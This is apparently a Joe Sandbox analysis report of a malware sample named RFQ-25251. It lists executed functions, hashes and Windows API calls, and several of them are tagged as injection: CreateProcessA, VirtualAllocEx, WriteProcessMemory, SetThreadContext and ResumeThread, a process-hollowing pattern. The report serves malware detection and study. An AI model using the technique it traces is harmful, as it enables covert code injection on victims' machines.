30088->30090 30090->30082

                              Executed Functions

                              Function 0810CE28 Relevance: .3, Instructions: 349COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289941995.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8100000_RFQ-25251.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e3ab05719aadc5094383c52739cbb3889614be210484c86cd00d2a4c16ed7c4f
                              • Instruction ID: 7de2002009d5be428949e22998cf2c79b694f2055b36a311c72921c39711cd59
                              • Opcode Fuzzy Hash: e3ab05719aadc5094383c52739cbb3889614be210484c86cd00d2a4c16ed7c4f
                              • Instruction Fuzzy Hash: 75D1AA717012018FDB29DB79C810BABB7E6AFC9602F14866DD046CB3D5DB75E902CBA1
                              Function 015DD270 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 015DD2FE
                              • GetCurrentThread.KERNEL32 ref: 015DD33B
                              • GetCurrentProcess.KERNEL32 ref: 015DD378
                              • GetCurrentThreadId.KERNEL32 ref: 015DD3D1
                              Memory Dump Source
                              • Source File: 00000000.00000002.1286217307.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_15d0000_RFQ-25251.jbxd
                              Similarity
                              • API ID: Current$ProcessThread
                              • String ID:
                              • API String ID: 2063062207-0
                              • Opcode ID: 4bb3c0247cbf20cc7c181d4aefdd15b388fcba6b8c45d56a9a29a3c58e9fed66
                              • Instruction ID: 1b72b22371b6e51edaa56ba5b09920cff37b49a462ee6daaaded96ad930d0d0e
                              • Opcode Fuzzy Hash: 4bb3c0247cbf20cc7c181d4aefdd15b388fcba6b8c45d56a9a29a3c58e9fed66
                              • Instruction Fuzzy Hash: E95158B09103498FEB28DFA9D588BAEBBF1FF48304F248459D019AB390DB745985CB65
                              Function 015DD280 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 015DD2FE
                              • GetCurrentThread.KERNEL32 ref: 015DD33B
                              • GetCurrentProcess.KERNEL32 ref: 015DD378
                              • GetCurrentThreadId.KERNEL32 ref: 015DD3D1
                              Memory Dump Source
                              • Source File: 00000000.00000002.1286217307.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_15d0000_RFQ-25251.jbxd
                              Similarity
                              • API ID: Current$ProcessThread
                              • String ID:
                              • API String ID: 2063062207-0
                              • Opcode ID: fb2a9ba99488968bf701e47a4319095598a391f389cd876b337c1429166163ff
                              • Instruction ID: 74b2e81d5287c1ea6bc075bfcb6dda7239bfc0eed1cf946534654440ae78fb97
                              • Opcode Fuzzy Hash: fb2a9ba99488968bf701e47a4319095598a391f389cd876b337c1429166163ff
                              • Instruction Fuzzy Hash: 2A5159B09103498FDB28DFAAD548BAEBBF1FF4C304F248459D019A7390DB745984CB65
                              Function 0810A22C Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 44 810a22c-810a2cd 46 810a306-810a326 44->46 47 810a2cf-810a2d9 44->47 52 810a328-810a332 46->52 53 810a35f-810a38e 46->53 47->46 48 810a2db-810a2dd 47->48 49 810a300-810a303 48->49 50 810a2df-810a2e9 48->50 49->46 54 810a2eb 50->54 55 810a2ed-810a2fc 50->55 52->53 56 810a334-810a336 52->56 63 810a390-810a39a 53->63 64 810a3c7-810a481 CreateProcessA 53->64 54->55 55->55 57 810a2fe 55->57 58 810a338-810a342 56->58 59 810a359-810a35c 56->59 57->49 61 810a344 58->61 62 810a346-810a355 58->62 59->53 61->62 62->62 65 810a357 62->65 63->64 66 810a39c-810a39e 63->66 75 810a483-810a489 64->75 76 810a48a-810a510 64->76 65->59 68 810a3a0-810a3aa 66->68 69 810a3c1-810a3c4 66->69 70 810a3ac 68->70 71 810a3ae-810a3bd 68->71 69->64 70->71 71->71 73 810a3bf 71->73 73->69 75->76 86 810a520-810a524 76->86 87 810a512-810a516 76->87 89 810a534-810a538 86->89 90 810a526-810a52a 86->90 87->86 88 810a518 87->88 88->86 92 810a548-810a54c 89->92 93 810a53a-810a53e 89->93 90->89 91 810a52c 90->91 91->89 95 810a55e-810a565 92->95 96 810a54e-810a554 92->96 93->92 94 810a540 93->94 94->92 97 810a567-810a576 95->97 98 810a57c 95->98 96->95 97->98 100 810a57d 98->100 100->100
                              APIs
                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0810A46E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289941995.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8100000_RFQ-25251.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0
                              • Opcode ID: 5c8dfdcdfb1e320545ce732404a5f02bfc7d387f411248cccdd4e5fb47c0506a
                              • Instruction ID: e375892f5ffb50603d11618df64ac5d6d28179a6ccacdc660379ebfa093d7aef
                              • Opcode Fuzzy Hash: 5c8dfdcdfb1e320545ce732404a5f02bfc7d387f411248cccdd4e5fb47c0506a
                              • Instruction Fuzzy Hash: 53A13871D007299FEB24CF69CC41BADBBB2BF44311F148169D849AB280DBB49985CF91
                              Function 0810A238 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 101 810a238-810a2cd 103 810a306-810a326 101->103 104 810a2cf-810a2d9 101->104 109 810a328-810a332 103->109 110 810a35f-810a38e 103->110 104->103 105 810a2db-810a2dd 104->105 106 810a300-810a303 105->106 107 810a2df-810a2e9 105->107 106->103 111 810a2eb 107->111 112 810a2ed-810a2fc 107->112 109->110 113 810a334-810a336 109->113 120 810a390-810a39a 110->120 121 810a3c7-810a481 CreateProcessA 110->121 111->112 112->112 114 810a2fe 112->114 115 810a338-810a342 113->115 116 810a359-810a35c 113->116 114->106 118 810a344 115->118 119 810a346-810a355 115->119 116->110 118->119 119->119 122 810a357 119->122 120->121 123 810a39c-810a39e 120->123 132 810a483-810a489 121->132 133 810a48a-810a510 121->133 122->116 125 810a3a0-810a3aa 123->125 126 810a3c1-810a3c4 123->126 127 810a3ac 125->127 128 810a3ae-810a3bd 125->128 126->121 127->128 128->128 130 810a3bf 128->130 130->126 132->133 143 810a520-810a524 133->143 144 810a512-810a516 133->144 146 810a534-810a538 143->146 147 810a526-810a52a 143->147 144->143 145 810a518 144->145 145->143 149 810a548-810a54c 146->149 150 810a53a-810a53e 146->150 147->146 148 810a52c 147->148 148->146 152 810a55e-810a565 149->152 153 810a54e-810a554 149->153 150->149 151 810a540 150->151 151->149 154 810a567-810a576 152->154 155 810a57c 152->155 153->152 154->155 157 810a57d 155->157 157->157
                              APIs
                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0810A46E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289941995.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8100000_RFQ-25251.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0
                              • Opcode ID: 150e15dcf9b0e5a8617206f79e1313abb6c2a7c8edad0142ed9c32845682b283
                              • Instruction ID: de899cde4d943d5cd376808f8b813b39d53118caad16d817fe83c27839cc9c4f
                              • Opcode Fuzzy Hash: 150e15dcf9b0e5a8617206f79e1313abb6c2a7c8edad0142ed9c32845682b283
                              • Instruction Fuzzy Hash: 98912871D00729DFEB24CF69CC41BADBBB2BF48311F148169E849A7280DBB599858F91
                              Function 015DAFE8 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 158 15dafe8-15daff7 159 15daff9-15db006 call 15d9a58 158->159 160 15db023-15db027 158->160 167 15db01c 159->167 168 15db008 159->168 161 15db029-15db033 160->161 162 15db03b-15db07c 160->162 161->162 169 15db07e-15db086 162->169 170 15db089-15db097 162->170 167->160 215 15db00e call 15db271 168->215 216 15db00e call 15db280 168->216 169->170 172 15db099-15db09e 170->172 173 15db0bb-15db0bd 170->173 171 15db014-15db016 171->167 174 15db158-15db218 171->174 176 15db0a9 172->176 177 15db0a0-15db0a7 call 15daca0 172->177 175 15db0c0-15db0c7 173->175 210 15db21a-15db21d 174->210 211 15db220-15db24b GetModuleHandleW 174->211 179 15db0c9-15db0d1 175->179 180 15db0d4-15db0db 175->180 178 15db0ab-15db0b9 176->178 177->178 178->175 179->180 182 15db0dd-15db0e5 180->182 183 15db0e8-15db0f1 call 15dacb0 180->183 182->183 189 15db0fe-15db103 183->189 190 15db0f3-15db0fb 183->190 191 15db105-15db10c 189->191 192 15db121-15db12e 189->192 190->189 191->192 194 15db10e-15db11e call 15dacc0 call 15dacd0 191->194 198 15db151-15db157 192->198 199 15db130-15db14e 192->199 194->192 199->198 210->211 212 15db24d-15db253 211->212 213 15db254-15db268 211->213 212->213 215->171 216->171
                              APIs
                              • GetModuleHandleW.KERNELBASE(00000000), ref: 015DB23E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1286217307.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_15d0000_RFQ-25251.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: e539b8c6a30de17882683af3d6477cc6fffde4ed547d103ffaa84a11d0057463
                              • Instruction ID: 838016c13319a55885073cc157ee53dbff60ac51aa06c98458c310b0b0231a2a
                              • Opcode Fuzzy Hash: e539b8c6a30de17882683af3d6477cc6fffde4ed547d103ffaa84a11d0057463
                              • Instruction Fuzzy Hash: 03713570A00B058FEB34DF6AD44075ABBF2FF89210F008A2DD49ADBA50D775E845CB91
                              Function 015D58EC Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 217 15d58ec-15d58f6 218 15d58f8-15d59b9 CreateActCtxA 217->218 220 15d59bb-15d59c1 218->220 221 15d59c2-15d5a1c 218->221 220->221 228 15d5a1e-15d5a21 221->228 229 15d5a2b-15d5a2f 221->229 228->229 230 15d5a31-15d5a3d 229->230 231 15d5a40 229->231 230->231 232 15d5a41 231->232 232->232
                              APIs
                              • CreateActCtxA.KERNEL32(?), ref: 015D59A9
                              Memory Dump Source
                              • Source File: 00000000.00000002.1286217307.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_15d0000_RFQ-25251.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              • Opcode ID: bb68a22bf86b5f3c80bbf0b84d9769d3cd7d40f1bba70caffa4572d543ba3386
                              • Instruction ID: 7b48a88910435479435ea3eba14d62c4c0bf78e6aa66d6f071a364df64c7900b
                              • Opcode Fuzzy Hash: bb68a22bf86b5f3c80bbf0b84d9769d3cd7d40f1bba70caffa4572d543ba3386
                              • Instruction Fuzzy Hash: A441F3B0C10719CFEB24CFA9C884BDDBBB1BF49304F20805AD418AB251DBB56986CF51
                              Function 015D44D4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 234 15d44d4-15d59b9 CreateActCtxA 237 15d59bb-15d59c1 234->237 238 15d59c2-15d5a1c 234->238 237->238 245 15d5a1e-15d5a21 238->245 246 15d5a2b-15d5a2f 238->246 245->246 247 15d5a31-15d5a3d 246->247 248 15d5a40 246->248 247->248 249 15d5a41 248->249 249->249
                              APIs
                              • CreateActCtxA.KERNEL32(?), ref: 015D59A9
                              Memory Dump Source
                              • Source File: 00000000.00000002.1286217307.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_15d0000_RFQ-25251.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              • Opcode ID: 80523d13a485660af5755394d908a43f6901b96491239df58e58178ccf6eeff6
                              • Instruction ID: b40f6c300c2c780918f08d7bb96d425ae9bf3b08b90b1859d0469f63a62441cb
                              • Opcode Fuzzy Hash: 80523d13a485660af5755394d908a43f6901b96491239df58e58178ccf6eeff6
                              • Instruction Fuzzy Hash: FB41D0B0C1071DCFEB24DFAAC844B9DBBB5BF49304F24806AD418AB251DBB56985CF91
                              Function 08109B71 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 251 8109b71-8109bc6 254 8109bd6-8109c15 WriteProcessMemory 251->254 255 8109bc8-8109bd4 251->255 257 8109c17-8109c1d 254->257 258 8109c1e-8109c4e 254->258 255->254 257->258
                              APIs
                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08109C08
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289941995.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8100000_RFQ-25251.jbxd
                              Similarity
                              • API ID: MemoryProcessWrite
                              • String ID:
                              • API String ID: 3559483778-0
                              • Opcode ID: cd0e78e1b0e41947757955f31ab90d117f8549580432553287f99904d664ae0e
                              • Instruction ID: bead91a51739d52fada773a9e7664f9c8608c58cb4321793ea766499ccc6dcaa
                              • Opcode Fuzzy Hash: cd0e78e1b0e41947757955f31ab90d117f8549580432553287f99904d664ae0e
                              • Instruction Fuzzy Hash: 5D2146719003099FDB10CFAAC980BDEBBF5FF48310F10842AE918A7241C7789945CBA4
                              Function 08109B78 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 262 8109b78-8109bc6 264 8109bd6-8109c15 WriteProcessMemory 262->264 265 8109bc8-8109bd4 262->265 267 8109c17-8109c1d 264->267 268 8109c1e-8109c4e 264->268 265->264 267->268
                              APIs
                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08109C08
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289941995.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8100000_RFQ-25251.jbxd
                              Similarity
                              • API ID: MemoryProcessWrite
                              • String ID:
                              • API String ID: 3559483778-0
                              • Opcode ID: 61c99cd9118c7bf70c1713952c4b25d38c94c5fc4cd3e5711fb74a0e8aaec91e
                              • Instruction ID: 5f11906b77bbd556c9efb0348e87c602882fc1390fbe9de2a2f066256f8ee3bc
                              • Opcode Fuzzy Hash: 61c99cd9118c7bf70c1713952c4b25d38c94c5fc4cd3e5711fb74a0e8aaec91e
                              • Instruction Fuzzy Hash: 1A2146B1D003099FDB10CFAAC984BEEBBF5FF48310F10842AE918A7241C7789941CBA5
                              Function 081099D8 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 272 81099d8-81099dc 273 8109a48-8109a6b Wow64SetThreadContext 272->273 274 81099de-8109a2b 272->274 276 8109a74-8109aa4 273->276 277 8109a6d-8109a73 273->277 281 8109a3b-8109a47 274->281 282 8109a2d-8109a39 274->282 277->276 281->273 282->281
                              APIs
                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08109A5E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289941995.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8100000_RFQ-25251.jbxd
                              Similarity
                              • API ID: ContextThreadWow64
                              • String ID:
                              • API String ID: 983334009-0
                              • Opcode ID: cf3bafc673c379506c6198965bae4853ea84271d47f36905fb38757e0d9e36e5
                              • Instruction ID: 2198eda39298482a31a469cea671b4a1cea49403fd2a2acfc695b5aca9cd00ec
                              • Opcode Fuzzy Hash: cf3bafc673c379506c6198965bae4853ea84271d47f36905fb38757e0d9e36e5
                              • Instruction Fuzzy Hash: 73215971D04309CFDB20CFAAC8847EEBBF5EF89210F14842AD859A7241C7789945CFA0
                              Function 081099E0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 285 81099e0-8109a2b 287 8109a3b-8109a6b Wow64SetThreadContext 285->287 288 8109a2d-8109a39 285->288 291 8109a74-8109aa4 287->291 292 8109a6d-8109a73 287->292 288->287 292->291
                              APIs
                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08109A5E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289941995.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8100000_RFQ-25251.jbxd
                              Similarity
                              • API ID: ContextThreadWow64
                              • String ID:
                              • API String ID: 983334009-0
                              • Opcode ID: da0db773953cfc033b077474495ad689bed2a57c1d0e275a0db2a01178ffa53d
                              • Instruction ID: 4caacf0de23be3c1a1ccfdd344db72644af13dc3f1e91d0d7dc8fd18f3a5351f
                              • Opcode Fuzzy Hash: da0db773953cfc033b077474495ad689bed2a57c1d0e275a0db2a01178ffa53d
                              • Instruction Fuzzy Hash: 86213871D003098FDB20DFAAC8857EEBBF5EF48210F14842AD459A7241C7789945CFA4
                              Function 0810A09B Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 296 810a09b-810a12d ReadProcessMemory 299 810a136-810a166 296->299 300 810a12f-810a135 296->300 300->299
                              APIs
                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0810A120
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289941995.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8100000_RFQ-25251.jbxd
                              Similarity
                              • API ID: MemoryProcessRead
                              • String ID:
                              • API String ID: 1726664587-0
                              • Opcode ID: 345acf697b18815352bec804e0fba53d9e95f10dd4dd70ab94e4839cf179acb0
                              • Instruction ID: 1d583bfc13b9229c1bad02cea95ecbc43e8fee0cf8a57b1636cdaca4caa3930f
                              • Opcode Fuzzy Hash: 345acf697b18815352bec804e0fba53d9e95f10dd4dd70ab94e4839cf179acb0
                              • Instruction Fuzzy Hash: 282125B1D003599FDB20CFAAD880BEEBBF1FF48310F50842AE958A7250C7799941CB60
                              Function 0810A0A0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 304 810a0a0-810a12d ReadProcessMemory 307 810a136-810a166 304->307 308 810a12f-810a135 304->308 308->307
                              APIs
                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0810A120
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289941995.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8100000_RFQ-25251.jbxd
                              Similarity
                              • API ID: MemoryProcessRead
                              • String ID:
                              • API String ID: 1726664587-0
                              • Opcode ID: 25e3b87f5c6d821d9bd4fcbba20a4fc90b72485795b0dce9806bf7d727eb9963
                              • Instruction ID: dea01df6c52ddff32e7d97a4f3f71bd6c3a68165ed195915d35a8172610b73e0
                              • Opcode Fuzzy Hash: 25e3b87f5c6d821d9bd4fcbba20a4fc90b72485795b0dce9806bf7d727eb9963
                              • Instruction Fuzzy Hash: 3E211971C003599FDB20DF9AC840BEEBBF5FF48310F50842AE958A7240C7759951CB64
                              Function 015DD4C8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 312 15dd4c8-15dd55c DuplicateHandle 313 15dd55e-15dd564 312->313 314 15dd565-15dd582 312->314 313->314
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015DD54F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1286217307.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_15d0000_RFQ-25251.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: ca62f261ac75530d13b35e4a78997aa74393f0931c3a790c5c3aceb9a86748c4
                              • Instruction ID: 303ff5beedb3e460503c9bba9f4d68eb45257ce4484c7d046425585086789496
                              • Opcode Fuzzy Hash: ca62f261ac75530d13b35e4a78997aa74393f0931c3a790c5c3aceb9a86748c4
                              • Instruction Fuzzy Hash: 6721E4B5D003089FDB10CF9AD484ADEBBF4FB48310F14841AE918A7350D375A940CF65
                              Function 015DD4C1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 317 15dd4c1-15dd55c DuplicateHandle 318 15dd55e-15dd564 317->318 319 15dd565-15dd582 317->319 318->319
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015DD54F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1286217307.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_15d0000_RFQ-25251.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: db626bd9158edd72933245e4532cd300e217fbb4c27961e05f2b2eec1187f279
                              • Instruction ID: 2fdfe7ba18847ea3062b0fc7b666e0617ad7c9d5b42e2e2d6ce261110c280265
                              • Opcode Fuzzy Hash: db626bd9158edd72933245e4532cd300e217fbb4c27961e05f2b2eec1187f279
                              • Instruction Fuzzy Hash: 7A21DFB6D003089FDB10CFAAD984AEEBBF4AB08310F14841AE928A7250D375A940CF65
                              Function 08109AB0 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08109B26
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289941995.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8100000_RFQ-25251.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 685eb95c5663e47aecdc7d62841cbcb1bfec2dc68dbd1a7bdc7af01cf0ed0f10
                              • Instruction ID: fbd21fbffb8edcbc44dc004dcda58599eea90fa1f055fb89abed94bc6053882f
                              • Opcode Fuzzy Hash: 685eb95c5663e47aecdc7d62841cbcb1bfec2dc68dbd1a7bdc7af01cf0ed0f10
                              • Instruction Fuzzy Hash: 522158729003499FDB20DFAAC844BDEBFF5EF48320F24841AD955AB250C775A945CFA0
                              Function 015DACF8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,015DB2B9,00000800,00000000,00000000), ref: 015DB4CA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1286217307.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_15d0000_RFQ-25251.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: fbb4160a5fcf8a64e1d8dee3a010ac807bcff64db41427410074c326bd9d8850
                              • Instruction ID: 2f9904c77aa81ef6008c5ea795cebd2f5157a73f43645754e26a7e26df033cbb
                              • Opcode Fuzzy Hash: fbb4160a5fcf8a64e1d8dee3a010ac807bcff64db41427410074c326bd9d8850
                              • Instruction Fuzzy Hash: 5D1103B69003099FDB24CF9AD444BDEFBF6EB89210F14842ED919AB200C375A945CFA5
                              Function 08109AB8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08109B26
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289941995.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8100000_RFQ-25251.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 856e55bf1f1d11756b994f5e7c6dcda7dc2f176224716277c0a67a41fddcb845
                              • Instruction ID: 415e198b945312970300b13142fa6dd0d049392d943897120ca7ea2a0047888d
                              • Opcode Fuzzy Hash: 856e55bf1f1d11756b994f5e7c6dcda7dc2f176224716277c0a67a41fddcb845
                              • Instruction Fuzzy Hash: B51156728003089FDB20DFAAC844BEEBFF5EF48320F24841AE915A7250C775A940CFA0
                              Function 015DB458 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,015DB2B9,00000800,00000000,00000000), ref: 015DB4CA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1286217307.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_15d0000_RFQ-25251.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: 1a59e81ebe09c5c60b8a0dd7fd1b9b2e29a5fedc50af00494e6f7ac428b40c52
                              • Instruction ID: 0885cdcac629fbebdee91b71f8d6e2a98cee20636e4ba62c5e9db78e6b59c251
                              • Opcode Fuzzy Hash: 1a59e81ebe09c5c60b8a0dd7fd1b9b2e29a5fedc50af00494e6f7ac428b40c52
                              • Instruction Fuzzy Hash: 4A1112B6D003099FDB24CF9AD544BDEFBF5AB88310F14842AD929AB200C375A545CFA5
                              Function 08109929 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289941995.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8100000_RFQ-25251.jbxd
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: 813c5f49c214be6484f87722ccf9001d3644c55ab724f14fe9d62fb046a4eb1e
                              • Instruction ID: e837134f3a1bb9bd6c97e3c84c7538c43f07a13427f956810e1c7c74d84d96c4
                              • Opcode Fuzzy Hash: 813c5f49c214be6484f87722ccf9001d3644c55ab724f14fe9d62fb046a4eb1e
                              • Instruction Fuzzy Hash: AA1134B5D003498FDB24DFAAC5447EEBBF5EF88210F24841AC459AB250CB796945CBA4
                              Function 08109930 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289941995.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8100000_RFQ-25251.jbxd
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: 6b46cba744c2f349aaabc4413f8801d2ecd2b7f1c6db62bdfc174df3005b49ac
                              • Instruction ID: 2016c64412279f7ab51b22d2c990d2fd22a73581d3ece3fea0809b3a9ec481c4
                              • Opcode Fuzzy Hash: 6b46cba744c2f349aaabc4413f8801d2ecd2b7f1c6db62bdfc174df3005b49ac
                              • Instruction Fuzzy Hash: 95113AB1D003498FDB24DFAAC4447EEFBF5EF88220F24841AD459A7240C7796945CFA5
                              Function 0810DD08 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                              Download Yara Rule
                              APIs
                              • FindCloseChangeNotification.KERNELBASE(?), ref: 0810DD68
                              Memory Dump Source
                              • Source File: 00000000.00000002.1289941995.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                              Joe Sandbox IDA Plugin
